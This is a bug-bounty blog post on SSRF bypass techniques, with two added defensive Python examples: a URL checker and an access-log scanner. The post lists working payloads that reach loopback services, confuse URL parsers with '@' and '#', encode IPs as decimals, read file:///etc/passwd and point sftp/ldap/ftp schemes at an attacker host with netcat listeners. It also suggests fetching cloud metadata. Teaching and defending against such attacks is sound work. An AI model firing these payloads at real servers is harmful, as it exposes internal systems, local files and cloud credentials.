In this post I share how I use bypass logic to turn SSRFs into RCEs and other critical information disclosures, which pay good bounties $$$, along with some tools and resources that are very helpful in your testing. Read and scroll; there are a lot of takeaways in this post.

SSRF (Server Side Request Forgery) is a vulnerability that lets an attacker make crafted requests on behalf of the web application. The end goal is to craft requests that fetch data from internal systems which sit behind firewalls, IDS, etc. and are inaccessible from outside the organisation.

Types of SSRF:
  1. Basic: we get the response of the crafted request back.
  2. Blind: the response is not displayed, but the request is still made and triggers the action.
Impact of the vulnerability:
  • Scanning of the internal network.
  • Reading internally hosted files/data.
  • Accessing services listening on the loopback interface (127.0.0.1).
  • Reading local system files.
  • If it is hosted on AWS, accessing the AWS REST interface.

Let's look at how to learn bypasses in SSRF scenarios so the bug can be chained into something far more critical.

Vulnerabilities are everywhere, but practice and a crystal-clear grasp of the basics, such as how URL parsers behave in different environments, is what lets you build the bypass logic.

Let's say we got a basic SSRF in the parameter ?pageid=

Target URL : http://target.url/home.php?pageid=

Attacker server : https://subhajitsaha.com

So to get reflected XSS we can simply fetch a malicious JS/SVG file from the external server.

http://target.url/home.php?pageid=https://subhajitsaha.com/jvv/evilsvgfile.svg

[Image: XSS PoC from subhajitsaha.com]

TBH I don't like this, because most of the time we can't escalate a reflected XSS, but sometimes some really good escalations are possible; it totally depends on your scenario.

Bypassing : Finding the internal services

http://target.url/home.php?pageid=http://localhost/anyinternalapps/admin.php

It can lead to scanning the internally running services. But most of the time localhost is on the blacklist, so we need to find other ways to get in. My last SSRF submission got me into Elasticsearch, an internal service of theirs that was running without authentication.

pageid=http://127.0.0.1 

pageid=http://localhost  

Other payloads that can be used for bypassing this:

http://127.0.0.1:80
http://127.0.0.1:443
http://127.0.0.1:22
http://0.0.0.0:80
http://0.0.0.0:443
http://0.0.0.0:22

http://spoofed.burpcollaborator.net can be used as the host; it points to 127.0.0.1 / localhost. You can also create your own subdomain, add a DNS A record and point it at 127.0.0.1. Just that simple 😊

Also check nip.io; it lets you create custom domain mappings so you don't need to edit /etc/hosts frequently. Whether you are doing Hack The Box challenges or black-box testing, it helps a lot.

Abusing the parsers: 

http://target.url/home.php?pageid=http://target.url#@subhajitsaha.com

http://target.url:80\@subhajitsaha.com:80/

http://target.url:80\@@subhajitsaha.com:80/

http://target.url:80:\@@subhajitsaha.com:80/

http://target.url:80#\@subhajitsaha.com:80/

Here, http://target.url thinks the request is being made to its own domain/IP, so it looks like a legitimate request with no third-party / attacker domain involved. But because we are using '@', the URL parser treats everything before it as credentials and sends the request to the attacker's domain. This is how the parsers can be abused; different parsers parse the same URL differently.

I am attaching the research of Orange Tsai on this, which is incredible and which he has presented at many conferences. Here is the link to view.

Abusing the parser with IP conversion:

We can abuse the parser by converting the IP address (four 8-bit octets) into a single decimal number.

I use this tool, https://www.browserling.com/tools/ip-to-dec, to convert IP addresses into decimals.

For example : 

http://target.url/home.php?pageid=http://127.0.0.1 becomes http://target.url/home.php?pageid=http://2130706433

IP conversion and encoding get past blacklisted values.

Sometimes double encoding also works for bypassing.

There are a few other ways, using URL schemes:

file://

http://target.url/home.php?pageid=file:///etc/passwd
http://target.url/home.php?pageid=file://\/\/etc/passwd

 

sftp : http://target.url/home.php?pageid=sftp://subhajitsaha.com:1337

subhajitsaha.com:$ nc -lvp 1337

ldap : http://target.url/home.php?pageid=ldap://subhajitsaha.com:1337 (ldaps , ldapi)

subhajitsaha.com:$ nc -lvp 1337

ftp : http://target.url/home.php?pageid=ftp://subhajitsaha.com:1337

subhajitsaha.com:$ nc -lvp 1337

tftp : http://target.url/home.php?pageid=tftp://subhajitsaha.com:1337

subhajitsaha.com:$ nc -lvp 1337

Bypassing : By using Unicode circles

http://target.url/home.php?pageid=http://ⓢⓤⓑⓗⓐⓙⓘⓣⓢⓐⓗⓐ.ⓒⓞⓜ

Surprisingly, it works. The URL parser normalises the Unicode circled letters into plain text.

① ② ③ ④ ⑤ ⑥ ⑦ ⑧ ⑨ ⑩ ⑪ ⑫ ⑬ ⑭ ⑮ ⑯ ⑰ ⑱ ⑲ ⑳ ⑴ ⑵ ⑶ ⑷ ⑸ ⑹ ⑺ ⑻ ⑼ ⑽ ⑾ ⑿ ⒀ ⒁ ⒂ ⒃ ⒄ ⒅ ⒆ ⒇ ⒈ ⒉ ⒊ ⒋ ⒌ ⒍ ⒎ ⒏ ⒐ ⒑ ⒒ ⒓ ⒔ ⒕ ⒖ ⒗ ⒘ ⒙ ⒚ ⒛ ⒜ ⒝ ⒞ ⒟ ⒠ ⒡ ⒢ ⒣ ⒤ ⒥ ⒦ ⒧ ⒨ ⒩ ⒪ ⒫ ⒬ ⒭ ⒮ ⒯ ⒰ ⒱ ⒲ ⒳ ⒴ ⒵ Ⓐ Ⓑ Ⓒ Ⓓ Ⓔ Ⓕ Ⓖ Ⓗ Ⓘ Ⓙ Ⓚ Ⓛ Ⓜ Ⓝ Ⓞ Ⓟ Ⓠ Ⓡ Ⓢ Ⓣ Ⓤ Ⓥ Ⓦ Ⓧ Ⓨ Ⓩ ⓐ ⓑ ⓒ ⓓ ⓔ ⓕ ⓖ ⓗ ⓘ ⓙ ⓚ ⓛ ⓜ ⓝ ⓞ ⓟ ⓠ ⓡ ⓢ ⓣ ⓤ ⓥ ⓦ ⓧ ⓨ ⓩ ⓪ ⓫ ⓬ ⓭ ⓮ ⓯ ⓰ ⓱ ⓲ ⓳ ⓴ ⓵ ⓶ ⓷ ⓸ ⓹ ⓺ ⓻ ⓼ ⓽ ⓾ ⓿
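The following is an added example written for this page, not code from the original post: a defensive checker that does what the fetcher does before deciding, so that the '@' parser tricks, the decimal IP, the circled letters, the alternative schemes and a DNS record pointed at loopback all resolve to the same answer. It goes beyond the page's decimal example by also accepting the hex and octal forms that inet_aton understands. The function names, the injectable resolver, the FAKE_DNS table and the placeholder addresses 1.2.3.4 and 5.6.7.8 are assumptions constructed for the example.

```python
"""Defensive counterpart to the bypasses above: canonicalise a user-supplied
URL the way a fetcher would, then refuse anything that lands on an internal
address.  Added example, not code from the original post.  Assumption: the
application only needs public http/https resources; the resolver is injectable
so the example runs offline against a constructed lookup table."""
import ipaddress
import socket
import unicodedata
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}


def naive_allowlist(url):
    """The kind of check the '@' payloads defeat: a plain string prefix test."""
    return url.startswith("http://target.url")


def canonical_hostname(url):
    """Host the fetcher will actually contact: scheme checked, userinfo before
    the last '@' dropped, port dropped, lower-cased and NFKC-normalised
    (IDNA/nameprep clients map enclosed letters such as 'ⓢ' to 's')."""
    parts = urlsplit(url.strip())
    if parts.scheme not in ALLOWED_SCHEMES:
        raise ValueError(f"scheme not allowed: {parts.scheme!r}")
    if not parts.hostname:
        raise ValueError("no host in URL")
    return unicodedata.normalize("NFKC", parts.hostname)


def parse_ip_literal(host):
    """Accept the notations inet_aton accepts (dotted quad, hex or octal
    parts, a single 32-bit decimal such as 2130706433) plus IPv6 literals.
    Returns None when the host is a name rather than an address."""
    try:
        return ipaddress.ip_address(host)
    except ValueError:
        pass
    parts = host.split(".")
    if not 1 <= len(parts) <= 4:
        return None
    values = []
    for p in parts:
        if p[:2].lower() == "0x":
            base, digits = 16, p[2:]
        elif len(p) > 1 and p[0] == "0":
            base, digits = 8, p[1:]
        else:
            base, digits = 10, p
        if not digits.isalnum():          # rejects signs, underscores, empty parts
            return None
        try:
            values.append(int(digits, base))
        except ValueError:
            return None
    number = 0
    for v in values[:-1]:                 # leading parts are single octets
        if v > 255:
            return None
        number = (number << 8) | v
    tail_bits = 8 * (5 - len(values))     # the last part fills the remaining bytes
    if values[-1] >= 1 << tail_bits:
        return None
    return ipaddress.IPv4Address((number << tail_bits) | values[-1])


def is_internal(ip):
    """Loopback, RFC 1918, link-local (where cloud metadata services live),
    0.0.0.0, multicast, reserved and any other non-global space count as internal."""
    if isinstance(ip, ipaddress.IPv6Address) and ip.ipv4_mapped:
        ip = ip.ipv4_mapped
    return (ip.is_loopback or ip.is_private or ip.is_link_local or ip.is_unspecified
            or ip.is_multicast or ip.is_reserved or not ip.is_global)


def system_resolver(host):
    """Every address the OS resolver returns for host (IPv4 and IPv6)."""
    return {ipaddress.ip_address(info[4][0].split("%")[0])
            for info in socket.getaddrinfo(host, None)}


def check_fetch_target(url, resolver=system_resolver):
    """(ok, reason): ok is False when any address behind the URL is internal."""
    try:
        host = canonical_hostname(url)
    except ValueError as exc:
        return False, str(exc)
    literal = parse_ip_literal(host)
    try:
        addresses = {literal} if literal else resolver(host)
    except OSError:
        addresses = set()
    if not addresses:
        return False, f"{host} does not resolve"
    for ip in addresses:
        if is_internal(ip):
            return False, f"{host} -> {ip} is internal"
    return True, f"{host} -> {', '.join(map(str, addresses))}"


# Constructed lookup table so the example runs offline (no real DNS is used).
FAKE_DNS = {
    "localhost": ["127.0.0.1"],
    "spoofed.burpcollaborator.net": ["127.0.0.1"],  # an A record pointed at loopback
    "subhajitsaha.com": ["1.2.3.4"],                 # placeholder public address
    "target.url": ["5.6.7.8"],                       # placeholder public address
}


def fake_resolver(host):
    return {ipaddress.ip_address(a) for a in FAKE_DNS.get(host, [])}


if __name__ == "__main__":
    for candidate in ["http://127.0.0.1:80", "http://2130706433", "http://0x7f.1",
                      "http://0.0.0.0:443", "http://localhost",
                      "http://spoofed.burpcollaborator.net",
                      "http://target.url#@subhajitsaha.com",
                      "http://target.url:80\\@subhajitsaha.com:80/",
                      "http://ⓢⓤⓑⓗⓐⓙⓘⓣⓢⓐⓗⓐ.ⓒⓞⓜ",
                      "file:///etc/passwd", "sftp://subhajitsaha.com:1337"]:
        ok, why = check_fetch_target(candidate, fake_resolver)
        print(f"prefix-check={naive_allowlist(candidate)!s:5} "
              f"resolve-check={ok!s:5} {candidate} ({why})")
```

Two caveats a practitioner would want: the fetch must connect to the address that was vetted (pin it, or re-run the check after every redirect hop), otherwise a DNS answer that changes between check and fetch reopens the hole; and if the application percent-decodes the parameter before fetching, run the check on the decoded value, which is exactly what the double-encoding bypass relies on.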

Hope this helps you understand how bypasses can be done. Keep all these payloads in your notes, or better, write a bash script that generates the payloads for you from two user inputs, targeturl and attackerurl; I hope to put that on my GitHub soon. Also, if the target is on a cloud instance, try fetching the metadata.
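On the detection side, as an added example that is not part of the original post: a scanner over constructed web-server access-log lines that flags pageid values carrying the shapes used above (a non-http scheme, credentials before an '@', an IP written as one number or in hex, a non-ASCII host, a double-encoded value, a loopback target). The combined log format, the pageid parameter name and the timestamps are assumptions; the log lines are constructed, not captured traffic.

```python
"""Flag access-log requests whose ?pageid= value looks like an SSRF bypass.
Added example, not from the original post.  Assumptions: combined log format,
pageid is the fetch parameter, and the application percent-decodes it once."""
import re
from urllib.parse import parse_qs, unquote, urlsplit

LOG_RE = re.compile(r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>\S+) (?P<path>\S+) \S+" (?P<status>\d+)')
NUMERIC_HOST = re.compile(r'^(0x[0-9a-f]+|\d+)(\.(0x[0-9a-f]+|\d+)){0,3}$', re.I)
DOTTED_QUAD = re.compile(r'^\d{1,3}(\.\d{1,3}){3}$')
LOOPBACK = re.compile(r'^(localhost|127\.\d+\.\d+\.\d+|0\.0\.0\.0)$')


def classify_target(value):
    """Indicator names triggered by one pageid value (empty list = nothing odd)."""
    hits = []
    decoded = unquote(value)          # the app already decoded once; a second layer
    if decoded != value:              # only exists for a double-encoding bypass
        hits.append("double-encoded")
    try:
        parts = urlsplit(decoded)
    except ValueError:                # malformed bracketed IPv6 and the like
        return hits + ["unparseable"]
    if parts.scheme and parts.scheme not in ("http", "https"):
        hits.append("non-http-scheme")
    if "@" in parts.netloc:
        hits.append("userinfo-in-authority")
    host = parts.hostname or ""
    if NUMERIC_HOST.match(host) and not DOTTED_QUAD.match(host):
        hits.append("non-dotted-ip-literal")
    if not host.isascii():
        hits.append("non-ascii-host")
    if LOOPBACK.match(host):
        hits.append("loopback-host")
    return hits


def scan_log(lines):
    """Return (source ip, raw pageid value, indicators) for every suspicious request."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        query = urlsplit(m["path"]).query
        for value in parse_qs(query).get("pageid", []):   # parse_qs decodes once
            hits = classify_target(value)
            if hits:
                findings.append((m["src"], value, hits))
    return findings


# Constructed sample lines (not real traffic); the first one is the plain
# external fetch, which this shape-based check deliberately does not flag.
SAMPLE_LOG = [
    '10.1.2.3 - - [10/Oct/2023:13:55:36 +0000] "GET /home.php?pageid=https%3A%2F%2Fsubhajitsaha.com%2Fjvv%2Fevilsvgfile.svg HTTP/1.1" 200 512',
    '10.1.2.3 - - [10/Oct/2023:13:55:40 +0000] "GET /home.php?pageid=http%3A%2F%2F2130706433 HTTP/1.1" 200 9200',
    '10.1.2.3 - - [10/Oct/2023:13:55:44 +0000] "GET /home.php?pageid=http%3A%2F%2Ftarget.url%3A80%5C%40subhajitsaha.com%3A80%2F HTTP/1.1" 200 512',
    '10.1.2.3 - - [10/Oct/2023:13:55:50 +0000] "GET /home.php?pageid=file%3A%2F%2F%2Fetc%2Fpasswd HTTP/1.1" 200 1840',
    '10.1.2.3 - - [10/Oct/2023:13:55:55 +0000] "GET /home.php?pageid=http%3A%2F%2F%2531%2532%2537.0.0.1 HTTP/1.1" 200 9200',
]

if __name__ == "__main__":
    for src, value, hits in scan_log(SAMPLE_LOG):
        print(f"{src} pageid={value!r} -> {', '.join(hits)}")
```

Shape checks like these are cheap and noisy by design; pair them with the response size and the destination seen at the egress proxy, since a 200 with an unusual body length to a loopback target is the strongest signal in the sample above.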

A week ago @dorkerdevil and I were testing an SSRF parameter and escalated it to RCE (Remote Code Execution), which is a priority 1 bug.

Hope I shared some content worth reading.

Share it with people; it motivates me to write more posts.

Thanks for reading!

 

Also read : https://medium.com/@D0rkerDevil/how-i-convert-ssrf-to-xss-in-a-ssrf-vulnerable-jira-e9f37ad5b158

 
